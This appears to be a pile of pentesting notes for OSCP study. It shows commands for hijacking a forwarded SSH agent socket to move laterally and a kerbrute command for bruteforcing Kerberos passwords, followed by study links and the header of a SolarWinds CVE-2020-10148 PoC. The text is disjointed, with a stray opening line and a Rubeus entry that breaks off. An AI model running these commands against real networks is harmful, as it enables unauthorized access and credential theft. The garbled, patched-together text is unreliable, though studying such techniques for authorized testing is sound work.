dskho dskho

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

How to pass the OSCP

Recon
Find vuln
Exploit
Escalate
Document it

Time yourself

24x7x365 SUPPORT http://www.captiongenerator.com/320492/Offsec-Student-Admins

https://natesubra.com/go/oscp

OSCP Syllabus:

https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

Windows Privilege Escalation:

http://www.fuzzysecurity.com/tutorials/16.html https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

	# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
	# @0xSha
	# (C) 2020 0xSha.io

	# Advisory : https://www.solarwinds.com/securityadvisory
	# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
	# Details : https://kb.cert.org/vuls/id/843464

	# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
	# According to SolarWinds.Orion.Web.HttpModules